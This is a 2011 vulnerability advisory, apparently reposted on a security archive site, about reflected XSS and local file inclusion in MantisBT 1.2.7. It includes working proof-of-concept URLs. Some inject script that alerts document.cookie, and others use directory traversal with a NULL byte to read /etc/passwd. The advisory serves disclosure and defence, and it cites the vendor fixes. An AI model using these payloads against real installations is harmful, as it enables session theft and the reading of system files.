MantisBT CMS Multiple Vulnerabilities(SQL/XSS)

2011.09.22
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-79
CWE-22

Vulnerability ID: HTB23045 Reference: https://www.htbridge.ch/advisory/multiple_vulnerabilities_in_mantisbt.ht ml Product: MantisBT Vendor: www.mantisbt.org ( http://www.mantisbt.org/ ) Vulnerable Version: 1.2.7 and probably prior Tested Version: 1.2.7 Vendor Notification: 31 August 2011 Vulnerability Type: Local File Inclusion, XSS Status: Fixed by Vendor Risk level: High Credit: High-Tech Bridge SA Security Research Lab ( https://www.htbridge.ch/advisory/ ) Vulnerability Details: High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in MantisBT, which can be exploited to perform cross-site scripting, local file inclusion attacks. 1) Input passed via the "action" GET parameter to bug_actiongroup_ext_page.php & bug_actiongroup_page.php is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of affected website. The following PoC code is available: http://[host]/bug_actiongroup_ext_page.php?bug_arr[]=1&action=EXT_%22%3E %3Cscript%3Ealert%28document.cookie%29;%3C/script%3E http://[host]/bug_actiongroup_page.php?bug_arr[]=[ISSUE_ID]&action=EXT_% 22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E 2) Input passed via the "action" GET parameter to bug_actiongroup_ext_page.php & bug_actiongroup_page.php is not properly verified before being used to include files. This can be exploited to include arbitrary files from local resources via directory traversal sequences and URL-encoded NULL bytes. http://[host]/bug_actiongroup_ext_page.php?bug_arr[]=1&action=EXT_/../.. /../../../../../etc/passwd%00 http://[host]/bug_actiongroup_page.php?bug_arr[]=[ISSUE_ID]&action=EXT_/ ../../../../../../../etc/passwd%00 3) Input appended to the URL after manage_config_email_page.php & manage_config_workflow_page.php is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of affected website. http://[host]/manage_config_email_page.php/%22%3E%3Cimg%20src=1%20onerro r=%22javascript:alert%28document.cookie%29;%22%3E/ http://[host]/manage_config_workflow_page.php/%22%3E%3Cimg%20src=1%20one rror=%22javascript:alert%28document.cookie%29;%22%3E/ 4) Input passed via the "platform", "os", "os_build", GET parameter to bug_report_page.php is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of affected website. http://[host]/bug_report_page.php?platform=%22%3E%3Cscript%3Ealert%28doc ument.cookie%29;%3C/script%3E Solution: Upgrade to the most recent version

References:

https://github.com/mantisbt/mantisbt/commit/6ede60d3db9e202044f135001589cce941ff6f0f
https://github.com/mantisbt/mantisbt/commit/5b93161f3ece2f73410c296fed8522f6475d273d
https://bugzilla.redhat.com/show_bug.cgi?id=735514
http://www.openwall.com/lists/oss-security/2011/09/04/2
http://lists.fedoraproject.org/pipermail/package-announce/2011-September/066061.html
http://lists.debian.org/debian-security-tracker/2011/09/msg00012.html
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=640297
https://www.htbridge.ch/advisory/multiple_vulnerabilities_in_mantisbt.html
http://www.securityfocus.com/bid/49448
http://www.securityfocus.com/archive/1/archive/1/519547/100/0/threaded
http://www.openwall.com/lists/oss-security/2011/09/09/9
http://www.openwall.com/lists/oss-security/2011/09/04/1
http://www.mantisbt.org/bugs/view.php?id=13281
http://www.debian.org/security/2011/dsa-2308
http://secunia.com/advisories/45961


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top